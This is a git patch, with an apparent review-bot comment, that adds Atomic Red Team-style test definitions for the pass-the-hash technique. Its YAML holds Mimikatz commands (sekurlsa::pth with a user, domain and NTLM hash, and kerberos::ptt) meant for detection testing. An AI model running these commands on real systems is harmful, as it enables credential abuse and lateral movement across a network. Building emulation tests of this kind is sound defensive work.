From 86dff30791cf453ef0fffec9b1647718dd85c7bc Mon Sep 17 00:00:00 2001
From: Michael Haag <“mike@redcanary.com git config --global user.name “Michael Haag>
Date: Fri, 25 May 2018 08:24:11 -0400
Subject: [PATCH] T1075 Action packed
---
 atomics/T1075/T1075.yaml | 43 ++++++++++++++++++++++++++++++++++++++++
 1 file changed, 43 insertions(+)
 create mode 100644 atomics/T1075/T1075.yaml
diff --git a/atomics/T1075/T1075.yaml b/atomics/T1075/T1075.yaml
new file mode 100644
index 00000000..638a168a
--- /dev/null
+++ b/atomics/T1075/T1075.yaml
@@ -0,0 +1,43 @@
+---
+attack_technique: T1075
+display_name: Pass the Hash
+
+atomic_tests:
+- name: Mimikatz Pass the Hash
+ description: |
+ Note: must dump hashes first
+ [Reference](https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa#pth)
+
+ supported_platforms:
+ - windows
+
+ input_arguments:
+ user:
+ description: username
+ type: string
+ default: Administrator
+ domain:
+ description: domain
+ type: string
+ default: atomic.local
+ ntlm:
+ description: ntlm hash
+ type: string
+ default: cc36cf7a8514893efccd3324464tkg1a
+
+ executor:
+ name: command_prompt
+ command: |
+ mimikatz # sekurlsa::pth /user:${user} /domain:${domain} /ntlm:${ntlm}
+
+- name: Mimikatz Kerberos Ticket Attack
+ description: |
+ Similar to PTH, but attacking Kerberos
+
+ supported_platforms:
+ - windows
+
+ executor:
+ name: command_prompt
+ command: |
+ mimikatz # kerberos::ptt ${username}@${Domain}
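Review bot: The second test's command interpolates `${username}` and `${Domain}`, but that test declares no `input_arguments` and the first test's arguments are named `user` and `domain`, so neither placeholder can be substituted and the command would run with the literal `${...}` text. For consistency with the first test, declare `user` and `domain` on the second test and reference them as `${user}@${domain}` (sketched below), or declare `username`/`Domain` explicitly if different names are intended. Separately, the `ntlm` default `cc36cf7a8514893efccd3324464tkg1a` contains characters outside the hex alphabet, so it cannot be an actual NTLM hash; if it is a deliberate dummy, state that in its description, e.g. `description: ntlm hash (default is a placeholder, not a valid hash; supply a real value)`, so the test documents that this argument must be provided. As a point of style, `command: |` keeps a trailing newline in the value; `command: |-` would drop it if the executor does not expect one.
```yaml
- name: Mimikatz Kerberos Ticket Attack
  # … unchanged: description, supported_platforms …
  input_arguments:
    user:
      description: username
      type: string
      default: Administrator
    domain:
      description: domain
      type: string
      default: atomic.local

  executor:
    name: command_prompt
    command: |
      mimikatz # kerberos::ptt ${user}@${domain}
```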